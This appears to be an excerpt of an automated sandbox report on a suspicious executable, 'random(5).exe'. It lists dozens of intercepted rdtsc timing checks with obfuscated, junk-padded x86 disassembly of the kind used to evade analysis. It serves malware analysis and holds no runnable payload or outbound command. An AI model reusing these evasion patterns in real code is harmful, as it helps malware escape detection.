    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91082 second address: 6E910E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+08h] 0x0000000d jmp 00007F519CD4C380h 0x00000012 mov eax, dword ptr [esi] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F519CD4C37Eh 0x0000001b add si, 1598h 0x00000020 jmp 00007F519CD4C37Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 mov edx, 59549EBAh 0x0000002c pop edx 0x0000002d popad 0x0000002e mov dword ptr [edx], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F519CD4C388h 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E910E8 second address: 6E910F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E910F7 second address: 6E91162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 mov dword ptr [edx+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ebx, 216052D0h 0x0000001c pushfd 0x0000001d jmp 00007F519CD4C389h 0x00000022 sub ax, 0756h 0x00000027 jmp 00007F519CD4C381h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91162 second address: 6E91168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91168 second address: 6E91202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+08h] 0x0000000e jmp 00007F519CD4C386h 0x00000013 mov dword ptr [edx+08h], eax 0x00000016 jmp 00007F519CD4C380h 0x0000001b mov eax, dword ptr [esi+0Ch] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F519CD4C37Eh 0x00000025 adc ah, 00000038h 0x00000028 jmp 00007F519CD4C37Bh 0x0000002d popfd 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 mov dword ptr [edx+0Ch], eax 0x00000035 jmp 00007F519CD4C37Bh 0x0000003a mov eax, dword ptr [esi+10h] 0x0000003d jmp 00007F519CD4C386h 0x00000042 mov dword ptr [edx+10h], eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov bh, ah 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91202 second address: 6E91283 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F519CFC89C5h 0x0000000c or al, FFFFFFE6h 0x0000000f jmp 00007F519CFC89C1h 0x00000014 popfd 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+14h] 0x00000019 jmp 00007F519CFC89BEh 0x0000001e mov dword ptr [edx+14h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edx, 568AF4A0h 0x00000029 pushfd 0x0000002a jmp 00007F519CFC89C9h 0x0000002f xor esi, 7E5AB3A6h 0x00000035 jmp 00007F519CFC89C1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91283 second address: 6E91305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C387h 0x00000009 add si, A6DEh 0x0000000e jmp 00007F519CD4C389h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F519CD4C380h 0x0000001a adc cx, F6D8h 0x0000001f jmp 00007F519CD4C37Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov eax, dword ptr [esi+18h] 0x0000002b jmp 00007F519CD4C386h 0x00000030 mov dword ptr [edx+18h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov dl, 7Fh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91305 second address: 6E9130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9130A second address: 6E913BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C37Bh 0x00000009 add ah, FFFFFFFEh 0x0000000c jmp 00007F519CD4C389h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F519CD4C380h 0x00000018 sbb si, 65F8h 0x0000001d jmp 00007F519CD4C37Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [esi+1Ch] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov si, 6A41h 0x0000002f mov bh, cl 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007F519CD4C383h 0x00000038 add cx, 366Eh 0x0000003d jmp 00007F519CD4C389h 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [edx+1Ch], eax 0x00000047 jmp 00007F519CD4C37Eh 0x0000004c mov eax, dword ptr [esi+20h] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov bx, 7600h 0x00000056 mov cx, dx 0x00000059 popad 0x0000005a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E913BA second address: 6E913C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E913C0 second address: 6E913FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F519CD4C385h 0x00000014 and ecx, 41967EB6h 0x0000001a jmp 00007F519CD4C381h 0x0000001f popfd 0x00000020 mov ebx, esi 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E913FF second address: 6E91405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91405 second address: 6E9145D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F519CD4C37Ch 0x00000014 and cx, 1908h 0x00000019 jmp 00007F519CD4C37Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F519CD4C388h 0x00000025 and esi, 1F25BB68h 0x0000002b jmp 00007F519CD4C37Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9145D second address: 6E914E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0561300Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+24h], eax 0x00000010 jmp 00007F519CFC89C7h 0x00000015 mov eax, dword ptr [esi+28h] 0x00000018 jmp 00007F519CFC89C6h 0x0000001d mov dword ptr [edx+28h], eax 0x00000020 jmp 00007F519CFC89C0h 0x00000025 mov ecx, dword ptr [esi+2Ch] 0x00000028 jmp 00007F519CFC89C0h 0x0000002d mov dword ptr [edx+2Ch], ecx 0x00000030 jmp 00007F519CFC89C0h 0x00000035 mov ax, word ptr [esi+30h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E914E0 second address: 6E914E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E914E4 second address: 6E914EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E914EA second address: 6E914F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E914F0 second address: 6E914F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E914F4 second address: 6E91512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91512 second address: 6E91518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91518 second address: 6E915AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, A9E1h 0x00000007 mov ax, 031Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [esi+32h] 0x00000012 jmp 00007F519CD4C388h 0x00000017 mov word ptr [edx+32h], ax 0x0000001b pushad 0x0000001c mov eax, 295053FDh 0x00000021 mov si, 32F9h 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+34h] 0x00000029 jmp 00007F519CD4C384h 0x0000002e mov dword ptr [edx+34h], eax 0x00000031 pushad 0x00000032 mov dx, cx 0x00000035 pushad 0x00000036 mov bx, si 0x00000039 movzx ecx, bx 0x0000003c popad 0x0000003d popad 0x0000003e test ecx, 00000700h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F519CD4C388h 0x0000004d xor al, FFFFFF98h 0x00000050 jmp 00007F519CD4C37Bh 0x00000055 popfd 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E915AB second address: 6E915B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E915B0 second address: 6E915E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520C0FA4CAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F519CD4C385h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E915E0 second address: 6E915E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E915E6 second address: 6E91631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d call 00007F519CD4C381h 0x00000012 pop ebx 0x00000013 popad 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F519CD4C37Ah 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F519CD4C387h 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91631 second address: 6E91637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91637 second address: 6E9163B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9163B second address: 6E91650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F519CFC89BAh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91650 second address: 6E91656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91656 second address: 6E9165A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9165A second address: 6E91683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91683 second address: 6E916A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0D26 second address: 6EE0D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0D2A second address: 6EE0D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0D45 second address: 6EE0DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, D563h 0x0000000f pushad 0x00000010 mov al, 4Eh 0x00000012 pushfd 0x00000013 jmp 00007F519CD4C37Bh 0x00000018 jmp 00007F519CD4C383h 0x0000001d popfd 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F519CD4C389h 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 jmp 00007F519CD4C37Ch 0x0000002d push esi 0x0000002e mov bh, 6Ch 0x00000030 pop esi 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F519CD4C382h 0x0000003d and ch, FFFFFF98h 0x00000040 jmp 00007F519CD4C37Bh 0x00000045 popfd 0x00000046 mov cx, 514Fh 0x0000004a popad 0x0000004b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0DE6 second address: 6EE0E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F519CFC89C6h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80019 second address: 6E80036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80036 second address: 6E8003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E8003C second address: 6E80040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80040 second address: 6E800D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F519CFC89C4h 0x0000000f pushfd 0x00000010 jmp 00007F519CFC89C2h 0x00000015 add ax, F618h 0x0000001a jmp 00007F519CFC89BBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 call 00007F519CFC89C9h 0x00000026 pushfd 0x00000027 jmp 00007F519CFC89C0h 0x0000002c sbb ah, FFFFFFA8h 0x0000002f jmp 00007F519CFC89BBh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F519CFC89C2h 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E20035 second address: 6E2004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E209F2 second address: 6E20A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 jmp 00007F519CFC89C3h 0x0000000e popfd 0x0000000f mov edi, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F519CFC89C2h 0x0000001a push eax 0x0000001b jmp 00007F519CFC89BBh 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F519CFC89C6h 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E20A64 second address: 6E20A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E20A68 second address: 6E20A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E20A85 second address: 6E20AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CD4C37Dh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E20AAA second address: 6E20AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E20AB0 second address: 6E20AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E708FF second address: 6E7090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BBh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E7090E second address: 6E70912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70912 second address: 6E70952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b mov ah, dl 0x0000000d pop eax 0x0000000e mov bx, B27Ch 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007F519CFC89BBh 0x0000001b mov ebp, esp 0x0000001d jmp 00007F519CFC89C6h 0x00000022 pop ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov bx, cx 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50011 second address: 6E5002D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CD4C387h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E5002D second address: 6E50041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50041 second address: 6E50045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50045 second address: 6E50049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50049 second address: 6E5004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50225 second address: 6E5022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E5022B second address: 6E50278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F519CD4C385h 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, bh 0x00000016 pushfd 0x00000017 jmp 00007F519CD4C384h 0x0000001c sub cx, D1A8h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50278 second address: 6E50301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dl, ah 0x00000010 call 00007F519CFC89BFh 0x00000015 pop ecx 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F519CFC89C9h 0x0000001d and ah, FFFFFFD6h 0x00000020 jmp 00007F519CFC89C1h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp+24h], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F519CFC89C8h 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50301 second address: 6E50305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50305 second address: 6E5030B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E5030B second address: 6E50344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e jmp 00007F519CD4C380h 0x00000013 jc 00007F520D24E477h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, bx 0x0000001f mov edx, 16C6BBCCh 0x00000024 popad 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50344 second address: 6E5034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E5034A second address: 6E5034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E5034E second address: 6E5035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E5035D second address: 6E50361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50361 second address: 6E50367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50367 second address: 6E503CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C37Ah 0x00000009 adc cx, 0318h 0x0000000e jmp 00007F519CD4C37Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F519CD4C388h 0x0000001a xor ch, 00000078h 0x0000001d jmp 00007F519CD4C37Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop esi 0x00000027 jmp 00007F519CD4C386h 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E503CF second address: 6E503D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E503D3 second address: 6E503D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E503D7 second address: 6E503DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E8013D second address: 6E80143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
